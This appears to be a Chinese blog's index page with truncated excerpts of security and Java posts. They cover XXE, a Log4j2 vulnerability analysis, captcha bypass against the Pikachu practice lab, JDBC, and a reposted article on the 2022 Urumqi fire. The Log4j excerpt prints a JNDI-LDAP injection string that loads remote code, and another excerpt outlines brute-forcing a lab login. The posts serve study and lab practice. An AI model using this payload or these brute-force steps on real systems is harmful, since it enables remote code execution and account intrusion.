关于XXE漏洞大家相比都不陌生，虽包含在OWASP top10，算是比较常见的漏洞，但是在实战情况下较少遇到，之前文章中虽然也涉及到过XXE的漏洞复现，但是并未太过涉及该漏洞，正好之前有篇文章，修改了一下就发出来了 XXE、XML关于xxe是什么，那就不得不提xml了，简单来说xml就是一种语言，我们在创建java项目的时候通常用xml来引入依赖，xml与html不同，xml旨在传输信息，焦点是数据的格式。 xxe漏洞原因是在解析xml输入时，没有禁止外部实体的加载，导致加载恶意外部文件，而产生的危害，例如rce、任意文件read、内网探测等等，一般是结合其他漏洞打组合拳 XXE检测关于XXE的检测，工具去扫应该是最简单的方法了，所以就不介绍，只介绍一下手工的方法 数据格式首选可以看数据包的格式，例如 <user><username>1</username><password>1</password></user> 这种就是典型的xml格式的数据包，说明是支持xml的数据传输格式，可 ...

本篇文章写于2022年12月Java实训之后，对于jdbc技术有了一点点了解，故有了这篇文章；重点介绍java代码实现 jdbc是什么JDBC是一种可用于执行SQL语句的JavaAPI（ApplicationProgrammingInterface应用程序设计接口）。它由一些Java语言编写的类和界面组成。JDBC为数据库应用开发人员、数据库前台工具开发人员提供了一种标准的应用程序设计接口，使开发人员可以用纯Java语言编写完整的数据库 这里的数据库指的是市面上流行的数据库。如MySQL、Oracle、SQL server等数据库。 jdbc主要能完成的任务简单地说，JDBC能完成下列三件事： 1）同一个数据库建立连接； 2）向数据库发送SQL语句； 3）处理数据库返回的结果 本片文章的环境java版本：jdk1.8.0_221 数据库：MySQL 5.7.26 编译器：IntelliJ IDEA 2021.2.3 代码实现手动调用Class.forName()先来看实现数据库连接的代码 Class.forName("com.mysql.jdbc.Driver");//加载MySQL连 ...

转自一个此内容暂时无法观看的公正号：桃花源李白 这篇文章不知道什么时候会消失，且看且珍惜 原文链接(虽然已经不可能再看了): https://mp.weixin.qq.com/s/LIglX0w8EHXpizTV-UQ3DA 我转载的地方: https://posts.careerengine.us/p/6380905e34612a5765f57c40 公众号 微博 朋友圈 空间相关文章以及链接全部都被屏蔽，热搜在吃瓜和世界杯，这篇文章我竟然还是在外网找到的，可悲啊可悲 一、 2022年11月24日晚上7点多，新疆乌鲁木齐香梨产区，一高层住宅楼发生火灾。 起火的楼层是15楼，起先是小火。物业还在群里让大家不要乱跑。但很快，小火变中火，中火变大火。15楼烧到了17楼。直至黑色浓烟窜烧到了顶楼的21楼。 通告里说：接到报警后，消防第一时间赶赴现场处置，急救、应急、公安等力量，也迅速到现场开展救援行动。但明火被扑灭，是晚上的10点35分。这三个小时的时间，10人经抢救无效死亡，9人为中度吸入性肺损伤。 通告里还着重申明了一句：小区乃疫情低风险区，居民可下楼活动。 就这一句话，让各地网友们， ...

java笔记篇：包、final关键字、常量、抽象类、接口、内部类，都是一些零碎的知识，所以写一篇记录一下，偶尔翻出来看看。 包 final 常量 权限修饰符&&代码块 关于静态代码块实现数据的初始化，我在前面写的学生信息管理系统中添加一个不需要注册的管理员信息来实现；改写前App.java代码 改写后App.java代码： 那么我们运行尝试一下初始化添加的管理员信息是否有效 抽象类和抽象方法抽象类和抽象方法的定义方法 public abstract class Animal { public abstract void eat(); } //代码我就直接写在一个文件里面了，看起来方便一点 public class App { public static void main(String[] args) { Dog d = new Dog("大黄",3); d.eat(); d.drink(); Sheep s = new Shee ...

关于漏洞复现，请看上篇文章 漏洞代码就用上篇文章的代码 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class main { private static final Logger logger = LogManager.getLogger(); public static void main(String[] args) { System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); logger.error("${jndi:ldap://127.0.0.1:1389/Calc}"); } } 漏洞入口代码打上断点进行分析，也就是looger.error这一行，一些不重要的地方我就省略一下了，漏洞入口再e ...

log4j2这个漏洞相比大家不陌生了，是在2021年11月爆出来的apache log4j2的漏洞，下面会详细介绍，堪称漏洞界的核武器了，当时刚爆出来的时候其实就有所耳闻，但是当时并未接触java安全，时隔一年再翻出来看看也是颇有感受的，也算相较于去年进步了吧 这篇文章字有点多，好多概念以及需要了解的东西 漏洞相关信息背景Apache Log4j2是一个基于Java的日志记录工具，是一个很流行的日志记录工具，这才导致这个漏洞影响之大之广，轰动世界，说是核武器当然不为过 2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。 漏洞编号CNVD-2021-95919，CVE-2021-44228 ...

前言这篇文章水文一篇，起初是逛技术站看到了这样一篇文章，就好奇尝试一下，过程比较复杂，虽然并没什么用，但是对于一个年轻的小伙子对于未知东西的好奇，还是坚持找到了解决办法，大家就当图个乐吧 前期准备使用VMware安装MacOS虚拟机需要下面的三个资源 VMware Workstation：下载 VMware Workstation Pro 版本随意，推荐VMware Workstation 16 pro的环境，因为版本不同可能会出现不同的问题 MacOS的镜像，这里我提供两个10.13和10.14；链接：https://pan.baidu.com/s/1Cx9fAsyOiNtiyX2h_24eoA 提取码：kj5j 百度网盘限速下载慢的话建议看我百度网盘那篇文章 VMware Workstation默认是不支持MacOS虚拟机的安装，所以我们需要破解掉他的限制，这里用到github上的一个工具，https://github.com/paolo-projects/auto-unlocker/releases 注意下载Unlocker-v2.0.0a-x64.zip文件 下载好后 ...

这篇文章纯粹是个人笔记，感觉不重要但是知识零碎，自己可能过几天就忘了，所以发到网站上来闲着没事自己偶尔看看，复习一下 练习 这个程序我就不写了，相对来说简单一点 成员方法被继承的条件 继承原则 继承访问特点0x01成员变量访问特点 就近原则：先从本类的局部位置找，然后再去本类成员位置中找，然后再到父类成员位置找 0x02成员方法的访问特点 同成员变量访问特点，就近原则 方法重写：当父类中的方法不满足子类的需求的时候，可以写一个跟父类中方法名一样的方法来覆盖子类中的方法 虚方法表：非private 非static 非final修饰的方法可以加到虚方法表中 0x03构造方法的访问特点 如果想调用父类中的有参构造，必须手动书写来进行调用，例如下方例子 0x04练习 public class employs { private int number; private String name; private int money; public employs() { } public employs(i ...

前言偶然发现了在c盘出现了两个个好玩的文件，之前并没有对系统了解过多，也是借助这次偶然发现了跟mac一样的机制以及之前未接触到的机制 起因由于用的还是2016年的dell机子，c盘只有66g的内存，所以平时对c盘还是格外关注，今天在敲代码的时候发现前几秒还是35g，突然c盘就变成了30g，我就好奇到底是什么原因让c盘突然缩小了5个g，因为我也当时并没有往c盘安装或者存什么东西进去 经过拿everything按大小和时间都找了一遍，最后定位到一个叫pagefile.sys和一个叫hiberfil.sys的文件上，大小为6个G和3个G，最后修改时间也是2022/10/30日，也就是刚刚发生变化的时间 0x01pagefile.sys看一眼pagefile.sys属性，并没有发现什么有用的信息，但是肯定的是应该是系统生成的文件 到这里其实还是不清楚到底是什么文件，直到我把大部分正在运行的文件关闭时，我发现pagefile.sys这个文件变小了？但是hiberfil.sys并未变化 到这里我就更加奇怪了，这到底是个什么文件，我开满软件文件的时候修改并且变大，当我 ...

最近在挖洞的过程中遇到了这个问题，在后台暴力破解的时候，被验证码的问题卡住了，故才有了这篇文章，来研究一下暴力破解以及后台登录界面的验证码绕过问题。 关于验证码的问题我记得之前面试的时候被问到过，但是并没有特别仔细的写，这篇文章就结合案例来写一下，菜勿喷 验证码机制原理客户端发起请求 > 服务端响应并创建一个新的SessionID同时生成随机验证码，将验证码和SessionID一并返回给客户端 > 客户端提交验证码连同SessionID给服务端 > 服务端验证验证码同时销毁当前会话，返回给客户端结果 验证码复用0x01这种情况在现在基本上不存在了，也就只有pikachu这种入门漏洞靶场有这种情况，还是写一写把 直接进到pikachu暴力破解网站http://localhost/vul/burteforce/bf_server.php 随便输入用户名密码，验证码输入，burp抓包发送到repeat模块 那么问题就出来了，我们直接修改数据包中username和password然后send看一下变化 第一次 修改后 那么问题就很明显了，两次输入的密码不同但是验证码却 ...